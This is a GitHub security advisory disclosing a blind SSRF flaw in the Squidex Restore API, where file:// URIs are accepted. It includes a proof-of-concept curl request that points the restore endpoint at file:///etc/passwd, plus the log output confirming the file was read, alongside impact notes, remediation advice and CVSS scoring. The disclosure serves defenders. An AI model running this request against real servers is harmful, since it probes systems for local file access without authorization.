Skip to content

Blind SSRF via file:// Protocol in Restore API leading to Local File Interaction

Moderate
SebastianStehle published GHSA-45fq-w37p-qfw5 Apr 14, 2026

Package

nuget Squidex (NuGet)

Affected versions

<= 7.21.0

Patched versions

None

Description

Security Vulnerability Report: Blind SSRF in Restore API

Affected Component

Squidex API: Backup / Restore Engine (Endpoint: /api/apps/restore)

Summary

The Squidex Restore API is vulnerable to Blind Server-Side Request Forgery (SSRF). The application fails to validate the URI scheme of the user-supplied Url parameter, allowing the use of the file:// protocol. This allows an authenticated administrator to force the backend server to interact with the local filesystem, which can lead to Local File Interaction (LFI) and potential disclosure of sensitive system information through side-channel analysis of internal logs.

Details

  1. Configuration: An attacker creates a "Restore" job using a local filesystem URI (e.g., file:///etc/passwd).
  2. Trigger: The attacker submits the POST request to the restore endpoint.
  3. Execution: The backend accepts the request and passes the URL to a background worker (RestoreJob).
  4. Observation: While the API response is a generic 204 No Content, the internal server logs reveal that the server successfully opened and read the file before failing because the content was not a valid ZIP archive.

Proof of Concept (PoC)

1. Malicious Request

Run the following curl command (replace <TOKEN> with a valid admin token):

curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validation via Logs

After execution, the following error in the Squidex container logs confirms the internal file interaction:

{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Note: The InvalidDataException confirms that the server successfully accessed and read the bytes of the file.

Impact

This vulnerability allows authenticated attackers to:

1.Filesystem Reconnaissance: Confirm the presence of sensitive files (e.g., appsettings.json, secrets).

2.Information Disclosure: In multi-tenant environments, this could potentially be used to access other users' backup files.

Precedent & Related CVEs

-CVE-2024-52588: SSRF in CMS platforms allowing internal scanning via localhost/local files.

-CVE-2023-27156: Improper import URL validation leading to SSRF.

Remediation Recommendations

1.Protocol Whitelisting: Strictly allow only http:// and https:// schemes.

2.Input Validation: Implement a check to reject any URI using the file:// scheme before processing.

3.Safe IO Handling: Ensure that the underlying handlers are restricted from local filesystem resolution for user-provided inputs.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L

CVE ID

CVE-2026-41177

Weaknesses

External Control of File Name or Path

The product allows user input to control or influence paths or file names that are used in filesystem operations. Learn more on MITRE.

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

Credits